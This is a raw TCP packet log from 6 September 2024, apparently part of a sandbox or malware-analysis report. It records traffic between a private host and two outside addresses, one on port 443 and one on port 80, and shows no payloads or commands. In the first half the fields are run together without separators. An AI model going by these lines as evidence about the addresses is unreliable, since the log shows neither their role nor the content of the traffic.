                          Sep 6, 2024 11:26:04.293695927 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.293724060 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.293797970 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.293858051 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.293864965 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.294090986 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.294138908 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.294146061 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.335136890 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.335208893 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.335216999 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.335340023 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.335376024 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.335388899 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.335395098 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.335416079 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.353972912 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354020119 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354031086 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354129076 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354173899 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354180098 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354213953 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354248047 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354255915 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354262114 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354286909 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354288101 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354329109 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354335070 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354567051 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354603052 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354609966 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354615927 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354652882 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354659081 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354681969 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354808092 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.357789993 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.463454962 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.468384027 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.468442917 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.468487024 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.473215103 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968209982 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968229055 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968239069 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968249083 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968261003 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968271971 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968283892 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968295097 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968302011 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.968305111 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968317032 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968324900 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.968331099 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.973093033 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.973103046 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.973114014 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.973150015 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.977293968 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262355089 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262392998 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262406111 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262444973 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262475014 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262486935 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262497902 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262507915 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262520075 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262525082 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262536049 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262542963 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262543917 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262557030 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262566090 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262573957 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262584925 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262587070 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262594938 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262605906 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262607098 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262617111 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262623072 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262629032 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262639999 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262659073 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262674093 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262686014 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262696028 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262707949 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262717009 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262720108 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262742043 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.267522097 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267565012 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267570019 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.267580032 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267622948 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.267803907 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267824888 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267836094 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267846107 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267858028 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267864943 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.267882109 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.268656015 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.268666983 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.268676996 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.268692970 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.268697977 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.268703938 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.268728971 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.269594908 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.269606113 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.269617081 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.269627094 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.269638062 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.269639969 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.269645929 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.269670963 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.270437002 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.270452976 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.270462990 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.270473003 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.270482063 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.270483971 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.270499945 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.271194935 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.271229982 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.271238089 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.271240950 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.271271944 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.271301031 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.271312952 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.271343946 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.272083044 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272094965 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272104979 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272128105 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.272139072 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272149086 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272177935 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.272908926 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272936106 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272953033 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272968054 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272968054 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.272979021 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.273005962 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.273766041 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.273776054 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.273786068 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.273808002 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.273829937 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.273840904 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.273869038 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.274599075 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.274801970 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.274813890 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.274822950 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.274837017 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.274847031 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.274847031 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.274873972 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.275660038 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.275670052 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.275680065 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.275691032 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.275702953 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.275707006 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.275727987 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.276498079 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.276510954 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.276521921 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.276531935 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.276551008 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.276565075 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.277224064 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.277236938 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.277251005 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.277264118 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.277270079 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.277273893 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.277301073 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.278749943 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278765917 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278775930 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278786898 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278788090 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.278798103 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278804064 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.278837919 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.278865099 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278876066 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278906107 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.279232979 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.279242992 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.279253960 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.279258966 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.279263973 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.279301882 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.280033112 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280044079 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280078888 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.280090094 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280102015 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280111074 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280131102 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.280909061 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280920029 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280929089 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280955076 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.280961037 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280997992 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.281656981 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.281666994 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.281677961 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.281688929 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.281701088 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.281706095 CEST804916385.239.241.184192.168.2.22
Sep 6, 2024 11:26:05.281729937 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.282445908 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.282455921 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.282461882 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.282476902 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.282488108 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.282495022 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.282497883 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.282517910 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.282768965 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.282828093 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.282972097 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.282982111 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.282993078 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283003092 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283015013 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283025026 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.283025026 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.283025980 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283035994 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283047915 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283057928 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.283057928 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283070087 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283081055 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283082008 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.283103943 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.283474922 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283518076 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.283520937 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283530951 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283562899 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.283694029 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283720016 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283731937 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283763885 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.283864975 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283874035 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283885956 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283896923 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283906937 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283915043 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.283919096 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283925056 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.283929110 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283938885 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283948898 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283957005 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.283962011 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.283974886 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.285878897 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.285890102 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.285900116 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.285911083 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.285922050 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.285931110 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.285933018 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.285943985 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.285950899 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.285955906 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.285963058 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.285967112 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.285976887 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.285986900 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.286010027 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.315603971 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315646887 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315658092 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315702915 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.315713882 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315726042 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315737009 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315747976 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315752029 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.315763950 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.315900087 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315910101 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315924883 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315932989 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.315936089 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315946102 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315958023 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315968037 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315970898 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.315980911 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.315984964 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.315992117 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316003084 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316013098 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316014051 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316024065 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316030025 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316035032 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316057920 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316193104 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316235065 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316255093 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316265106 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316293001 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316313982 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316325903 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316335917 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316346884 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316365957 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316378117 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316534042 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316544056 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316553116 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316569090 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316577911 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316579103 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316589117 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316600084 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316601038 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316613913 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316623926 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316625118 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316634893 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316643953 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316668987 CEST  49163  80  192.168.2.22  85.239.241.184
Sep 6, 2024 11:26:05.316754103 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316765070 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316773891 CEST  80  49163  85.239.241.184  192.168.2.22
Sep 6, 2024 11:26:05.316793919 CEST  80  49163  85.239.241.184  192.168.2.22
